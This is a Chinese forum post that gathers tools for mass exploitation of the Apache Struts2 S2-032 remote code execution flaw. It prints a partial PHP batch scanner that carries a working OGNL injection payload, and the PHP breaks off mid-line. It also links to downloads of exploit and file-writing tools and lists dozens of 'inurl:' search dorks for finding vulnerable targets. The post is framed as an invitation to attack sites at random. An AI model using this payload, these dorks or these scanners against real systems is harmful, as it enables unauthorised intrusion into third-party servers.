不管效果怎么样,看到的,收集的都发出来了,自己去测试。

第一款、

大家都丢出来了,我也丢一个

效果图

PHP代码
< ?php /* Strutr 批量扫描工具 By:T0n9 */ error_reporting(0); if(empty($argv[1])){ print_r(" +==================================+ | S2-032命令执行批量扫描工具 | | http://www.moxia.org/ | | 墨侠团队 | | By:T0n9 | +==================================+ [+]程序还存在一些Bug 比如一些奇葩网站的回显误报相对较低 [+]扫完同目录生成文件名_ok.txt文本存放存在漏洞的网站 -&gt;php $argv[0] url.txt&lt;br ?>");exit;
}

$txt = explode("\n",file_get_contents($argv[1])); //要扫描的脚本

echo "[+]$argv[1] 共 ".count($txt)." 条\r\n";

//获取盘符路径POC
$poc = "?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23path%3d%23req.getRealPath(%23parameters.pp[0]),%23w%3d%23res.getWriter(),%23w.print(%23path),1?%23xx:%23request.toString&pp=%2f&encoding=UTF-8";

for($i = 0;$i<count($txt);$i++){
if(!empty($txt[$i])){
$u = trim($txt[$i]).$poc;
$data_str = c($u);
if(stripos($data_str,"

检测工具

下载地址:
链接: http://pan.baidu.com/s/1jIlNJsM 密码: 9gbf
解压密码:www.t0n9.com (备注有)

第二款:

第一,集成S232漏洞
第二, 自动识别016 019 032三种漏洞
第三,写文件支持任意目录,批量还没有实现

因为批量还没写好,本来不发布的,现在想想发出来玩玩。

源码:http://pan.baidu.com/s/1bp0Vnen

编译好的:http://pan.baidu.com/s/1nv4E9Nb

11.jpg

11.png

 

第三款

接下来的这个就是大家都喜欢的批量了。

111.png

下载地址:http://gongju.aizhan.com/

关键字:

inurl:VloginUser.action inurl:Mail.action inurl:code.action inurl:reg.action inurl:Address.action inurl:!Index.action inurl:login.action inurl:Add.action inurl:pageslist.action inurl:action.Action inurl:Message.action inurl:Ldap.action inurl:getMul.action inurl:shouye.action inurl:logout.action inurl:Valid.action inurl:search.action inurl:Magazine.action inurl:news.action inurl:init.action inurl:Page.action inurl:create.action inurl:index2.action inurl:default.action inurl:welcome.action inurl:Name.action inurl:single.action inurl:updateForm.action inurl:SysStart.action inurl:adminlogin.action inurl:Offportal.action inurl:Buying.action inurl:Success.action inurl:exchange.action inurl:menu.action inurl:Load.action inurl:airport.action inurl:Email.action inurl:On.action inurl:show.action inurl:tain.action inurl:Login!input.action inurl:randomPicture.action

骚年们,开始撸起吧。

第四款

S2-032批量POC工具

刚回来看见主页被刷屏...估计是晚了,赶紧写了个脚本加入我的并发框架中.
用法看图

2016-04-26 20:46:18屏幕截图.png

工具
https://github.com/Xyntax/POC-T

简陋的POC
https://github.com/Xyntax/POC-T/blob/master/module/S2032.py

so 现在看大牛们怎么采集url了

第五款:tangScan

http://www.tangscan.com/labs/3

最最最最后一个:K8大牛写的工具,灰常好用,还有K8飞刀,完美结合,自己百度K8的博客,百度都有的,在这儿不多赘述,免得浪费我搬砖的时间。